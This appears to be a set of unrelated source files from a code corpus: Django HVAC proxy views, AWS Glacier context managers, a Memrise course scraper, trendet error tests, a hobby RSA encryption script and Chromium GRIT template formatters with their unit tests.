r = proxy_request(request)
response = HttpResponse(
content=r.content,
status=r.status_code,
content_type=r.headers.get("Content-Type"),
)
return response
@csrf_exempt
def systems_dealer(request, serial):
"""Handle system dealer posts.
This view handles processing system status updates by the HVAC unit.
"""
r = proxy_request(request)
response = HttpResponse(
content=r.content,
status=r.status_code,
content_type=r.headers.get("Content-Type"),
)
return response
@csrf_exempt
def systems_notifications(request, serial):
"""Handle system notifications posts.
This view handles processing system status updates by the HVAC unit.
"""
r = proxy_request(request)
response = HttpResponse(
content=r.content,
status=r.status_code,
content_type=r.headers.get("Content-Type"),
)
return response
@csrf_exempt
def systems_idu_config(request, serial):
"""Handle system In-Door Unit posts.
This view handles processing system status updates by the HVAC unit.
"""
r = proxy_request(request)
response = HttpResponse(
content=r.content,
status=r.status_code,
content_type=r.headers.get("Content-Type"),
)
return response
@csrf_exempt
def systems_odu_config(request, serial):
"""Handle system Out-Door Unit posts.
This view handles processing system status updates by the HVAC unit.
"""
r = proxy_request(request)
response = HttpResponse(
content=r.content,
status=r.status_code,
content_type=r.headers.get("Content-Type"),
)
return response
@csrf_exempt
def systems_equipment_events(request, serial):
"""Handle system equipment events posts
This view handles processing system status updates by the HVAC unit.
"""
r = proxy_request(request)
response = HttpResponse(
content=r.content,
status=r.status_code,
content_type=r.headers.get("Content-Type"),
)
return response
``` |
{
"source": "jokallun/photo-organizers",
"score": 2
} |
#### File: jokallun/photo-organizers/aws_contexts.py
```python
import boto3
class GlacierCtx(object):
"""Context manager for glacier, sets defaults"""
def __init__(self, ctx, region=None):
self.region = region or ctx.config['glacier']['region']
self.glacier = boto3.resource('glacier', region_name=self.region)
def __enter__(self):
return self.glacier
def __exit__(self, *args):
pass
class VaultCtx(GlacierCtx):
"""Context manager for glacier vault, sets defaults"""
def __init__(self, ctx, vault_name=None, account_id=None, region=None):
GlacierCtx.__init__(self, ctx, region)
self.account_id = account_id or ctx.config['glacier']['account_id']
self.vault_name = vault_name or ctx.config['glacier']['vault_name']
self.vault = self.glacier.Vault(self.account_id, self.vault_name)
def __enter__(self):
return self.vault
class JobCtx(VaultCtx):
"""Context manager for glacier job, sets defaults"""
def __init__(self, ctx, id, vault_name=None, account_id=None, region=None):
VaultCtx.__init__(self, ctx, vault_name, account_id, region)
self.job = self.glacier.Job(account_id=self.account_id, vault_name=self.vault_name, id=id)
def __enter__(self):
return self.job
``` |
{
"source": "jokandre/memrise-scraper",
"score": 3
} |
#### File: memrise-scraper/memrise_scraper/memrise.py
```python
import argparse
import codecs, sys
import re
import requests
from bs4 import BeautifulSoup
import json
from pypinyin import pinyin, Style
COURSE_URL = "/course/977288/korean-grammar-in-use-11/"
CARD_COLUMNS = ("col_a", "col_b")
def lazy_property(fn):
"""Decorator that makes a property lazy-evaluated.
"""
attr_name = '_lazy_' + fn.__name__
@property
def _lazy_property(self):
if not hasattr(self, attr_name):
setattr(self, attr_name, fn(self))
return getattr(self, attr_name)
return _lazy_property
def get_soup(url):
# TODO: it works actually w/o cookies:
res = requests.get(
url if url.strip().startswith("http") else "http://www.memrise.com" + url)
soup = BeautifulSoup(res.text, "html.parser")
return soup
class Course(object):
def __init__(self, course_url):
match = re.match(r'^(.*)/(\d+)/?$', course_url)
if match:
course_url, level = match.groups()
else:
level = None
self.course_url = course_url
# a sligle level if it was included in the URL
self.level = level
@lazy_property
def soup(self):
return get_soup(self.course_url)
@property
def name(self):
el = self.soup.find("h1", class_="course-name")
return el.text if el else self.course_url.split('/')[-1]
@property
def levels(self):
#levels = soup.find(lambda tag: tag.name == "div" and "levels" in tag.attrs.get("class"))
levels = self.soup.find_all("a", class_="level")
for l in levels:
url = l.attrs.get("href")
if self.level and not url.endswith(self.level + '/'):
continue ## skip lelevel not requested
title = l.find("div", class_="level-title").text.strip()
yield (url, title)
def cards(self, *, level_url : str):
"""
:level_url: level URL
"""
def get_text(value):
return '' if value is None else value.text
soup = get_soup(level_url)
for thing in soup.find_all(lambda tag: tag.has_attr("data-thing-id")):
try:
cols = (get_text(thing.find("div", class_=col_name).find("div", class_="text"))
for col_name in CARD_COLUMNS)
except:
continue
yield cols
class CourseDataHolder(object):
def __init__(self, course_title):
self.course_title = course_title
self.levels = []
def addLevel(self, level_name, items):
self.levels.append({'title':level_name, 'rows': items})
def dump_course(*, course_url : str):
"""
:course_url: course URL
"""
course = Course(course_url=course_url)
for level_url, title in course.levels:
print("*** %s (%s)" % (title, level_url))
for card in course.cards(level_url=level_url):
print('\t'.join(card))
def dump_course2json(*, course_url:str, to_add_pinyin:bool):
"""
:course_url: course URL
"""
course = Course(course_url=course_url)
courseData = CourseDataHolder(course_url.split('/')[3])
for level_url, title in course.levels:
print("*** %s (%s)" % (title, level_url))
temp = []
for card in course.cards(level_url=level_url):
cols = list(card)
row_obj = {}
if to_add_pinyin:
pin = pinyin(cols[0], style=Style.TONE3)
flat_pin = [item for sublist in pin for item in sublist]
flat_pin = cedict_tones(flat_pin)
row_obj = {'a': cols[0], 'b': cols[1], 'pron': ' '.join(flat_pin)}
else:
row_obj = {'a': cols[0], 'b': cols[1]}
temp.append(row_obj)
courseData.addLevel(title, temp)
# print(courseData.__dict__, len(courseData.levels))
print(json.dumps(courseData.__dict__, ensure_ascii=False))
def cedict_tones(word):
"""
Convert <neutral tone> to 5, ie, le -> le5
:return: retval, array of pinyin pronunciations
"""
retval = []
for pron in word:
if not pron[-1].isdecimal():
pron = pron+'5'
retval.append(pron)
return retval
def main(course_url='', to_json=True, to_add_pinyin=True):
sys.stdout = codecs.getwriter("utf-8")(sys.stdout.detach())
# course_url = COURSE_URL if len(sys.argv) < 2 else sys.argv[1]
if to_json:
dump_course2json(course_url=course_url, to_add_pinyin=to_add_pinyin)
else:
dump_course(course_url=course_url)
if __name__ == "__main__":
P = argparse.ArgumentParser(
description='Scrape data from Memrise courses.'
)
P.add_argument(
'-u', '--url',
help='Partial url of the course, ie, /course/184712/practical-audio-visual-chinese-book-2-2/',
# required=True,
default='/course/184712/practical-audio-visual-chinese-book-2-2/'
)
P.add_argument(
'-j', '--json',
help='Use JSON formated output',
# required=True,
default=True
)
P.add_argument(
'-p', '--pinyin',
help='Add pinyin according to CCDICT dictionary',
default=True
)
ARGS = P.parse_args()
main(course_url=ARGS.url, to_json=ARGS.json, to_add_pinyin=ARGS.pinyin)
``` |
{
"source": "jokaorgua/trendet",
"score": 2
} |
#### File: trendet/tests/test_trendet_errors.py
```python
import pytest
from investpy import get_stock_historical_data
import trendet
def test_errors():
"""
This function raises trendet errors to improve coverage
"""
params = [
{
'stock': ['error'],
'country': 'Spain',
'from_date': '01/01/2018',
'to_date': '01/01/2019',
'window_size': 5,
'trend_limit': 3,
'labels': None,
'identify': 'both',
},
{
'stock': None,
'country': 'Spain',
'from_date': '01/01/2018',
'to_date': '01/01/2019',
'window_size': 5,
'trend_limit': 3,
'labels': None,
'identify': 'both',
},
{
'stock': 'error',
'country': 'Spain',
'from_date': '01/01/2018',
'to_date': '01/01/2019',
'window_size': 5,
'trend_limit': 3,
'labels': None,
'identify': 'both',
},
{
'stock': 'BBVA',
'country': None,
'from_date': '01/01/2018',
'to_date': '01/01/2019',
'window_size': 5,
'trend_limit': 3,
'labels': None,
'identify': 'both',
},
{
'stock': 'BBVA',
'country': 'error',
'from_date': '01/01/2018',
'to_date': '01/01/2019',
'window_size': 5,
'trend_limit': 3,
'labels': None,
'identify': 'both',
},
{
'stock': 'BBVA',
'country': ['error'],
'from_date': '01/01/2018',
'to_date': '01/01/2019',
'window_size': 5,
'trend_limit': 3,
'labels': None,
'identify': 'both',
},
{
'stock': 'BBVA',
'country': 'Spain',
'from_date': None,
'to_date': '01/01/2019',
'window_size': 5,
'trend_limit': 3,
'labels': None,
'identify': 'both',
},
{
'stock': 'BBVA',
'country': 'Spain',
'from_date': '01/01/2018',
'to_date': None,
'window_size': 5,
'trend_limit': 3,
'labels': None,
'identify': 'both',
},
{
'stock': 'BBVA',
'country': 'Spain',
'from_date': '01/01/2019',
'to_date': '01/01/2018',
'window_size': 5,
'trend_limit': 3,
'labels': None,
'identify': 'both',
},
{
'stock': 'BBVA',
'country': 'Spain',
'from_date': '01/01-2018',
'to_date': '01/01/2019',
'window_size': 5,
'trend_limit': 3,
'labels': None,
'identify': 'both',
},
{
'stock': 'BBVA',
'country': 'Spain',
'from_date': '01/01/2018',
'to_date': '_01*01/2019',
'window_size': 5,
'trend_limit': 3,
'labels': None,
'identify': 'both',
},
{
'stock': 'BBVA',
'country': 'Spain',
'from_date': '01/01/2018',
'to_date': '01/01/2019',
'window_size': 0,
'trend_limit': 3,
'labels': None,
'identify': 'both',
},
{
'stock': 'BBVA',
'country': 'Spain',
'from_date': '01/01/2018',
'to_date': '01/01/2019',
'window_size': 5,
'trend_limit': -1,
'labels': None,
'identify': 'both',
},
{
'stock': 'BBVA',
'country': 'Spain',
'from_date': '01/01/2018',
'to_date': '01/01/2019',
'window_size': 5,
'trend_limit': None,
'labels': None,
'identify': 'both',
},
{
'stock': 'BBVA',
'country': 'Spain',
'from_date': '01/01/2018',
'to_date': '01/01/2019',
'window_size': None,
'trend_limit': 1,
'labels': None,
'identify': 'both',
},
{
'stock': 'BBVA',
'country': 'Spain',
'from_date': '01/01/2018',
'to_date': '01/01/2019',
'window_size': 'error',
'trend_limit': 1,
'labels': None,
'identify': 'both',
},
{
'stock': 'BBVA',
'country': 'Spain',
'from_date': '01/01/2018',
'to_date': '01/01/2019',
'window_size': 1,
'trend_limit': 'error',
'labels': None,
'identify': 'both',
},
{
'stock': 'BBVA',
'country': 'Spain',
'from_date': '01/01/2018',
'to_date': '01/01/2019',
'window_size': 2,
'trend_limit': 5,
'labels': None,
'identify': 'both',
},
{
'stock': 'BBVA',
'country': 'Spain',
'from_date': '01/01/2018',
'to_date': '01/01/2019',
'window_size': 5,
'trend_limit': 3,
'labels': ['a', 'b'],
'identify': 'both',
},
{
'stock': 'BBVA',
'country': 'Spain',
'from_date': '01/01/2018',
'to_date': '01/01/2019',
'window_size': 5,
'trend_limit': 3,
'labels': 'error',
'identify': 'both',
},
{
'stock': 'BBVA',
'country': 'Spain',
'from_date': '01/01/2018',
'to_date': '01/01/2019',
'window_size': 5,
'trend_limit': 3,
'labels': None,
'identify': ['error'],
},
{
'stock': 'BBVA',
'country': 'Spain',
'from_date': '01/01/2018',
'to_date': '01/01/2019',
'window_size': 5,
'trend_limit': 3,
'labels': None,
'identify': 'error',
},
]
for param in params:
try:
trendet.identify_trends(stock=param['stock'],
country=param['country'],
from_date=param['from_date'],
to_date=param['to_date'],
window_size=param['window_size'],
trend_limit=param['trend_limit'],
labels=param['labels'],
identify=param['identify'])
except:
pass
try:
trendet.identify_all_trends(stock=param['stock'],
country=param['country'],
from_date=param['from_date'],
to_date=param['to_date'],
window_size=param['window_size'],
identify=param['identify'])
except:
pass
df = get_stock_historical_data(stock='REP',
country='Spain',
from_date='01/01/2018',
to_date='01/01/2019')
df['error'] = 'error'
params = [
{
'df': None,
'column': 'Close',
'window_size': 5,
'identify': 'both'
},
{
'df': ['error'],
'column': 'Close',
'window_size': 5,
'identify': 'both'
},
{
'df': df,
'column': None,
'window_size': 5,
'identify': 'both'
},
{
'df': df,
'column': ['error'],
'window_size': 5,
'identify': 'both'
},
{
'df': df,
'column': 'error',
'window_size': 5,
'identify': 'both'
},
{
'df': df,
'column': 'error',
'window_size': 5,
'identify': 'both'
},
{
'df': df,
'column': 'Close',
'window_size': None,
'identify': 'both'
},
{
'df': df,
'column': 'Close',
'window_size': 1,
'identify': 'both'
},
{
'df': df,
'column': 'Close',
'window_size': 5,
'identify': ['error']
},
{
'df': df,
'column': 'Close',
'window_size': 5,
'identify': 'error'
},
]
for param in params:
try:
trendet.identify_df_trends(df=param['df'],
column=param['column'],
window_size=param['window_size'],
identify=param['identify'])
except:
pass
if __name__ == '__main__':
test_errors()
``` |
{
"source": "jokasimr/rsa-implementation",
"score": 3
} |
#### File: jokasimr/rsa-implementation/crypt.py
```python
from secrets import randbelow
from math import log
import os
def generate_prime(bit_length):
bit_length = int(bit_length)
assert bit_length > 0
return int(os.popen(' '.join(['openssl', 'prime', '-generate', '-bits', str(bit_length)])).read())
def gcd(a, b):
while b != 0:
a, b = b, a % b
return a
def lcm(a, b):
return a*b//gcd(a, b)
def ctf(a,b):
return lcm(a-1, b-1)
def inverse(a, n):
t, newt = 0, 1
r, newr = n, a
while newr != 0:
quotient = r // newr
t, newt = newt, t - quotient * newt
r, newr = newr, r - quotient * newr
assert not r > 1
if t < 0 :
t = t + n
return t
def generate_e(l):
maximum = int(min(36, log(l,2)))
minimum = int(min(log(l, 2)/2, 18))
bit_length = randbelow(maximum-minimum)+minimum
e = generate_prime(bit_length=bit_length)
t = 0
while l%e==0:
t+=1
assert t<10
e = generate_prime(bit_length=bit_length)
return e
def create_key(p=None, q=None, bit_length=1024):
if not p:
p = generate_prime(bit_length)
if not q:
q = generate_prime(bit_length)
l = ctf(p, q)
e = generate_e(l)
d = inverse(e, l)
n = p*q
assert (e*d)%l == 1
return e, d, n
def padd(block, size):
cont = 10**size
return int(''.join(str(cont + ord(c)) \
for c in block))
def unpadd(block, size):
cont = 10**size
s = []
while block>0:
n = block%cont
block = block//(cont*10)
s.append(chr(n))
return ''.join(reversed(s))
def encrypt(x, pub_key, size=6):
res = []
i = 0
e, n = pub_key
block_size = len(str(n))//(size+1)
while len(x)>i:
if len(x)-i>block_size:
res.append(str(pow(padd(x[i:i+block_size], size=size), e, n)))
else:
res.append(str(pow(padd(x[i:], size=size), e, n)))
i+=block_size
return '/'.join(res)
def decrypt(y, key, size=6):
d, n = key
return ''.join(unpadd(pow(int(block), d, n), size=size) for block in y.split('/'))
# Example usage
e, d, n = create_key(bit_length=2048)
print('keylength: ', len(str(n)))
with open('test.txt', 'r') as foo:
s = foo.read()
se = encrypt(s, (e, n), size=3)
print('unencrypted length: ', len(s))
print('encrypted length: ', len(se))
t = decrypt(se, (d, n), size=3)
print('Passed test: ', all((c1==c2) for c1,c2 in zip(s,t))) # True if unencrypted and decrypted are equal
``` |
{
"source": "JoKaWare/WTL-DUI",
"score": 2
} |
#### File: grit/extern/FP.py
```python
try:
import hashlib
_new_md5 = hashlib.md5
except ImportError:
import md5
_new_md5 = md5.new
"""64-bit fingerprint support for strings.
Usage:
from extern import FP
print 'Fingerprint is %ld' % FP.FingerPrint('Hello world!')
"""
def UnsignedFingerPrint(str, encoding='utf-8'):
"""Generate a 64-bit fingerprint by taking the first half of the md5
of the string."""
hex128 = _new_md5(str).hexdigest()
int64 = long(hex128[:16], 16)
return int64
def FingerPrint(str, encoding='utf-8'):
fp = UnsignedFingerPrint(str, encoding=encoding)
# interpret fingerprint as signed longs
if fp & 0x8000000000000000L:
fp = - ((~fp & 0xFFFFFFFFFFFFFFFFL) + 1)
return fp
```
#### File: grit/format/interface.py
```python
import re
class ItemFormatter(object):
"""Base class for a formatter that knows how to format a single item."""
def Format(self, item, lang='', output_dir='.'):
"""Format the start of this item.
Returns a Unicode string representing 'item' in the format known by this
item formatter, for the language 'lang'.
Args:
item: anything.
lang: 'en'
output_dir: '.'
Returns:
A unicode string.
"""
return ''
def FormatEnd(self, item, lang='', output_dir='.'):
"""Format the end of this item.
Returns a Unicode string representing the closure of 'item' in the
format known by this item formatter, for the language 'lang'.
Called (optionally) after the children of item have been formatted.
Args:
item: anything
lang: 'en'
output_dir: '.'
Returns:
A unicode string.
"""
return ''
```
#### File: policy_templates/writers/admx_writer_unittest.py
```python
import os
import sys
import unittest
if __name__ == '__main__':
sys.path.append(os.path.join(os.path.dirname(sys.argv[0]), '../../../..'))
from grit.format.policy_templates.writers import admx_writer
from grit.format.policy_templates.writers import xml_writer_base_unittest
from xml.dom import minidom
class AdmxWriterTest(xml_writer_base_unittest.XmlWriterBaseTest):
def _CreateDocumentElement(self):
dom_impl = minidom.getDOMImplementation('')
doc = dom_impl.createDocument(None, 'root', None)
return doc.documentElement
def setUp(self):
# Writer configuration. This dictionary contains parameter used by the ADMX
# Writer
config = {
'win_group_policy_class': 'TestClass',
'win_supported_os': 'SUPPORTED_TESTOS',
'win_reg_mandatory_key_name': 'Software\\Policies\\Test',
'win_reg_recommended_key_name': 'Software\\Policies\\Test\\Recommended',
'win_mandatory_category_path': ['test_category'],
'win_recommended_category_path': ['test_recommended_category'],
'admx_namespace': 'ADMXWriter.Test.Namespace',
'admx_prefix': 'test_prefix'
}
self.writer = admx_writer.GetWriter(config)
self.writer.Init()
def _GetPoliciesElement(self, doc):
node_list = doc.getElementsByTagName('policies')
self.assertTrue(node_list.length == 1)
return node_list.item(0)
def _GetCategoriesElement(self, doc):
node_list = doc.getElementsByTagName('categories')
self.assertTrue(node_list.length == 1)
return node_list.item(0)
def testEmpty(self):
self.writer.BeginTemplate()
self.writer.EndTemplate()
output = self.writer.GetTemplateText()
expected_output = (
'<?xml version="1.0" ?>\n'
'<policyDefinitions revision="1.0" schemaVersion="1.0">\n'
' <policyNamespaces>\n'
' <target namespace="ADMXWriter.Test.Namespace"'
' prefix="test_prefix"/>\n'
' <using namespace="Microsoft.Policies.Windows" prefix="windows"/>\n'
' </policyNamespaces>\n'
' <resources minRequiredRevision="1.0"/>\n'
' <supportedOn>\n'
' <definitions>\n'
' <definition displayName="'
'$(string.SUPPORTED_TESTOS)" name="SUPPORTED_TESTOS"/>\n'
' </definitions>\n'
' </supportedOn>\n'
' <categories>\n'
' <category displayName="$(string.test_category)"'
' name="test_category"/>\n'
' <category displayName="$(string.test_recommended_category)"'
' name="test_recommended_category"/>\n'
' </categories>\n'
' <policies/>\n'
'</policyDefinitions>')
self.AssertXMLEquals(output, expected_output)
def testEmptyPolicyGroup(self):
empty_policy_group = {
'name': 'PolicyGroup',
'policies': []
}
# Initialize writer to write a policy group.
self.writer.BeginTemplate()
# Write policy group
self.writer.BeginPolicyGroup(empty_policy_group)
self.writer.EndPolicyGroup()
output = self.GetXMLOfChildren(self._GetPoliciesElement(self.writer._doc))
expected_output = ''
self.AssertXMLEquals(output, expected_output)
output = self.GetXMLOfChildren(
self._GetCategoriesElement(self.writer._doc))
expected_output = (
'<category displayName="$(string.test_category)"'
' name="test_category"/>\n'
'<category displayName="$(string.test_recommended_category)"'
' name="test_recommended_category"/>\n'
'<category displayName="$(string.PolicyGroup_group)"'
' name="PolicyGroup">\n'
' <parentCategory ref="test_category"/>\n'
'</category>')
self.AssertXMLEquals(output, expected_output)
def testPolicyGroup(self):
empty_policy_group = {
'name': 'PolicyGroup',
'policies': [
{'name': 'PolicyStub2',
'type': 'main'},
{'name': 'PolicyStub1',
'type': 'main'},
]
}
# Initialize writer to write a policy group.
self.writer.BeginTemplate()
# Write policy group
self.writer.BeginPolicyGroup(empty_policy_group)
self.writer.EndPolicyGroup()
output = self.GetXMLOfChildren(self._GetPoliciesElement(self.writer._doc))
expected_output = ''
self.AssertXMLEquals(output, expected_output)
output = self.GetXMLOfChildren(
self._GetCategoriesElement(self.writer._doc))
expected_output = (
'<category displayName="$(string.test_category)"'
' name="test_category"/>\n'
'<category displayName="$(string.test_recommended_category)"'
' name="test_recommended_category"/>\n'
'<category displayName="$(string.PolicyGroup_group)"'
' name="PolicyGroup">\n'
' <parentCategory ref="test_category"/>\n'
'</category>')
self.AssertXMLEquals(output, expected_output)
def _initWriterForPolicy(self, writer, policy):
'''Initializes the writer to write the given policy next.
'''
policy_group = {
'name': 'PolicyGroup',
'policies': [policy]
}
writer.BeginTemplate()
writer.BeginPolicyGroup(policy_group)
def testMainPolicy(self):
main_policy = {
'name': 'DummyMainPolicy',
'type': 'main',
}
self._initWriterForPolicy(self.writer, main_policy)
self.writer.WritePolicy(main_policy)
output = self.GetXMLOfChildren(self._GetPoliciesElement(self.writer._doc))
expected_output = (
'<policy class="TestClass" displayName="$(string.DummyMainPolicy)"'
' explainText="$(string.DummyMainPolicy_Explain)"'
' key="Software\\Policies\\Test" name="DummyMainPolicy"'
' presentation="$(presentation.DummyMainPolicy)"'
' valueName="DummyMainPolicy">\n'
' <parentCategory ref="PolicyGroup"/>\n'
' <supportedOn ref="SUPPORTED_TESTOS"/>\n'
' <enabledValue>\n'
' <decimal value="1"/>\n'
' </enabledValue>\n'
' <disabledValue>\n'
' <decimal value="0"/>\n'
' </disabledValue>\n'
'</policy>')
self.AssertXMLEquals(output, expected_output)
def testRecommendedPolicy(self):
main_policy = {
'name': 'DummyMainPolicy',
'type': 'main',
}
policy_group = {
'name': 'PolicyGroup',
'policies': [main_policy],
}
self.writer.BeginTemplate()
self.writer.BeginRecommendedPolicyGroup(policy_group)
self.writer.WriteRecommendedPolicy(main_policy)
output = self.GetXMLOfChildren(self._GetPoliciesElement(self.writer._doc))
expected_output = (
'<policy class="TestClass" displayName="$(string.DummyMainPolicy)"'
' explainText="$(string.DummyMainPolicy_Explain)"'
' key="Software\\Policies\\Test\\Recommended"'
' name="DummyMainPolicy_recommended"'
' presentation="$(presentation.DummyMainPolicy)"'
' valueName="DummyMainPolicy">\n'
' <parentCategory ref="PolicyGroup_recommended"/>\n'
' <supportedOn ref="SUPPORTED_TESTOS"/>\n'
' <enabledValue>\n'
' <decimal value="1"/>\n'
' </enabledValue>\n'
' <disabledValue>\n'
' <decimal value="0"/>\n'
' </disabledValue>\n'
'</policy>')
self.AssertXMLEquals(output, expected_output)
def testStringPolicy(self):
string_policy = {
'name': 'SampleStringPolicy',
'type': 'string',
}
self._initWriterForPolicy(self.writer, string_policy)
self.writer.WritePolicy(string_policy)
output = self.GetXMLOfChildren(self._GetPoliciesElement(self.writer._doc))
expected_output = (
'<policy class="TestClass" displayName="$(string.SampleStringPolicy)"'
' explainText="$(string.SampleStringPolicy_Explain)"'
' key="Software\\Policies\\Test" name="SampleStringPolicy"'
' presentation="$(presentation.SampleStringPolicy)">\n'
' <parentCategory ref="PolicyGroup"/>\n'
' <supportedOn ref="SUPPORTED_TESTOS"/>\n'
' <elements>\n'
' <text id="SampleStringPolicy" valueName="SampleStringPolicy"/>\n'
' </elements>\n'
'</policy>')
self.AssertXMLEquals(output, expected_output)
def testIntPolicy(self):
int_policy = {
'name': 'SampleIntPolicy',
'type': 'int',
}
self._initWriterForPolicy(self.writer, int_policy)
self.writer.WritePolicy(int_policy)
output = self.GetXMLOfChildren(self._GetPoliciesElement(self.writer._doc))
expected_output = (
'<policy class="TestClass" displayName="$(string.SampleIntPolicy)"'
' explainText="$(string.SampleIntPolicy_Explain)"'
' key="Software\\Policies\\Test" name="SampleIntPolicy"'
' presentation="$(presentation.SampleIntPolicy)">\n'
' <parentCategory ref="PolicyGroup"/>\n'
' <supportedOn ref="SUPPORTED_TESTOS"/>\n'
' <elements>\n'
' <decimal id="SampleIntPolicy" valueName="SampleIntPolicy"/>\n'
' </elements>\n'
'</policy>')
self.AssertXMLEquals(output, expected_output)
def testIntEnumPolicy(self):
enum_policy = {
'name': 'SampleEnumPolicy',
'type': 'int-enum',
'items': [
{'name': 'item_1', 'value': 0},
{'name': 'item_2', 'value': 1},
]
}
self._initWriterForPolicy(self.writer, enum_policy)
self.writer.WritePolicy(enum_policy)
output = self.GetXMLOfChildren(self._GetPoliciesElement(self.writer._doc))
expected_output = (
'<policy class="TestClass" displayName="$(string.SampleEnumPolicy)"'
' explainText="$(string.SampleEnumPolicy_Explain)"'
' key="Software\\Policies\\Test" name="SampleEnumPolicy"'
' presentation="$(presentation.SampleEnumPolicy)">\n'
' <parentCategory ref="PolicyGroup"/>\n'
' <supportedOn ref="SUPPORTED_TESTOS"/>\n'
' <elements>\n'
' <enum id="SampleEnumPolicy" valueName="SampleEnumPolicy">\n'
' <item displayName="$(string.item_1)">\n'
' <value>\n'
' <decimal value="0"/>\n'
' </value>\n'
' </item>\n'
' <item displayName="$(string.item_2)">\n'
' <value>\n'
' <decimal value="1"/>\n'
' </value>\n'
' </item>\n'
' </enum>\n'
' </elements>\n'
'</policy>')
self.AssertXMLEquals(output, expected_output)
def testStringEnumPolicy(self):
enum_policy = {
'name': 'SampleEnumPolicy',
'type': 'string-enum',
'items': [
{'name': 'item_1', 'value': 'one'},
{'name': 'item_2', 'value': 'two'},
]
}
# This test is different than the others because it also tests that space
# usage inside <string> nodes is correct.
dom_impl = minidom.getDOMImplementation('')
self.writer._doc = dom_impl.createDocument(None, 'policyDefinitions', None)
self.writer._active_policies_elem = self.writer._doc.documentElement
self.writer._active_mandatory_policy_group_name = 'PolicyGroup'
self.writer.WritePolicy(enum_policy)
output = self.writer.GetTemplateText()
expected_output = (
'<?xml version="1.0" ?>\n'
'<policyDefinitions>\n'
' <policy class="TestClass" displayName="$(string.SampleEnumPolicy)"'
' explainText="$(string.SampleEnumPolicy_Explain)"'
' key="Software\\Policies\\Test" name="SampleEnumPolicy"'
' presentation="$(presentation.SampleEnumPolicy)">\n'
' <parentCategory ref="PolicyGroup"/>\n'
' <supportedOn ref="SUPPORTED_TESTOS"/>\n'
' <elements>\n'
' <enum id="SampleEnumPolicy" valueName="SampleEnumPolicy">\n'
' <item displayName="$(string.item_1)">\n'
' <value>\n'
' <string>one</string>\n'
' </value>\n'
' </item>\n'
' <item displayName="$(string.item_2)">\n'
' <value>\n'
' <string>two</string>\n'
' </value>\n'
' </item>\n'
' </enum>\n'
' </elements>\n'
' </policy>\n'
'</policyDefinitions>')
self.AssertXMLEquals(output, expected_output)
def testListPolicy(self):
list_policy = {
'name': 'SampleListPolicy',
'type': 'list',
}
self._initWriterForPolicy(self.writer, list_policy)
self.writer.WritePolicy(list_policy)
output = self.GetXMLOfChildren(self._GetPoliciesElement(self.writer._doc))
expected_output = (
'<policy class="TestClass" displayName="$(string.SampleListPolicy)"'
' explainText="$(string.SampleListPolicy_Explain)"'
' key="Software\\Policies\\Test" name="SampleListPolicy"'
' presentation="$(presentation.SampleListPolicy)">\n'
' <parentCategory ref="PolicyGroup"/>\n'
' <supportedOn ref="SUPPORTED_TESTOS"/>\n'
' <elements>\n'
' <list id="SampleListPolicyDesc"'
' key="Software\Policies\Test\SampleListPolicy" valuePrefix=""/>\n'
' </elements>\n'
'</policy>')
self.AssertXMLEquals(output, expected_output)
def testDictionaryPolicy(self):
dict_policy = {
'name': 'SampleDictionaryPolicy',
'type': 'dict',
}
self._initWriterForPolicy(self.writer, dict_policy)
self.writer.WritePolicy(dict_policy)
output = self.GetXMLOfChildren(self._GetPoliciesElement(self.writer._doc))
expected_output = (
'<policy class="TestClass" displayName="$(string.'
'SampleDictionaryPolicy)"'
' explainText="$(string.SampleDictionaryPolicy_Explain)"'
' key="Software\\Policies\\Test" name="SampleDictionaryPolicy"'
' presentation="$(presentation.SampleDictionaryPolicy)">\n'
' <parentCategory ref="PolicyGroup"/>\n'
' <supportedOn ref="SUPPORTED_TESTOS"/>\n'
' <elements>\n'
' <text id="SampleDictionaryPolicy" '
'valueName="SampleDictionaryPolicy"/>\n'
' </elements>\n'
'</policy>')
self.AssertXMLEquals(output, expected_output)
def testPlatform(self):
# Test that the writer correctly chooses policies of platform Windows.
self.assertTrue(self.writer.IsPolicySupported({
'supported_on': [
{'platforms': ['win', 'zzz']}, {'platforms': ['aaa']}
]
}))
self.assertFalse(self.writer.IsPolicySupported({
'supported_on': [
{'platforms': ['mac', 'linux']}, {'platforms': ['aaa']}
]
}))
if __name__ == '__main__':
unittest.main()
```
#### File: grit/format/resource_map.py
```python
import os
from grit import util
from grit.format import interface
def GetMapName(root):
'''Get the name of the resource map based on the header file name. E.g.,
if our header filename is theme_resources.h, we name our resource map
kThemeResourcesMap.
|root| is the grd file root.'''
outputs = root.GetOutputFiles()
rc_header_file = None
for output in outputs:
if 'rc_header' == output.GetType():
rc_header_file = output.GetFilename()
if not rc_header_file:
raise Exception('unable to find resource header filename')
filename = os.path.splitext(os.path.split(rc_header_file)[1])[0]
filename = filename[0].upper() + filename[1:]
while filename.find('_') != -1:
pos = filename.find('_')
if pos >= len(filename):
break
filename = filename[:pos] + filename[pos + 1].upper() + filename[pos + 2:]
return 'k' + filename
class HeaderTopLevel(interface.ItemFormatter):
'''Create the header file for the resource mapping. This file just declares
an array of name/value pairs.'''
def Format(self, item, lang='en', output_dir='.'):
return '''\
// Copyright (c) %(year)d The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
// This file is automatically generated by GRIT. Do not edit.
#include <stddef.h>
#ifndef GRIT_RESOURCE_MAP_STRUCT_
#define GRIT_RESOURCE_MAP_STRUCT_
struct GritResourceMap {
const char* const name;
int value;
};
#endif // GRIT_RESOURCE_MAP_STRUCT_
extern const GritResourceMap %(map_name)s[];
extern const size_t %(map_name)sSize;
''' % { 'year': util.GetCurrentYear(),
'map_name': GetMapName(item.GetRoot()),
}
class SourceTopLevel(interface.ItemFormatter):
'''Create the C++ source file for the resource mapping. This class handles
the header/footer of the file.'''
def Format(self, item, lang='en', output_dir='.'):
grit_root = item.GetRoot()
outputs = grit_root.GetOutputFiles()
rc_header_file = None
map_header_file = None
for output in outputs:
if 'rc_header' == output.GetType():
rc_header_file = output.GetFilename()
elif 'resource_map_header' == output.GetType():
map_header_file = output.GetFilename()
if not rc_header_file or not map_header_file:
raise Exception('resource_map_source output type requires '
'resource_map_header and rc_header outputs')
return '''\
// Copyright (c) %(year)d The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
// This file is automatically generated by GRIT. Do not edit.
#include "%(map_header_file)s"
#include "base/basictypes.h"
#include "%(rc_header_file)s"
const GritResourceMap %(map_name)s[] = {
''' % { 'year': util.GetCurrentYear(),
'map_header_file': map_header_file,
'rc_header_file': rc_header_file,
'map_name': GetMapName(item.GetRoot()),
}
def FormatEnd(self, item, lang='en', output_dir='.'):
# Return the footer text.
return '''\
};
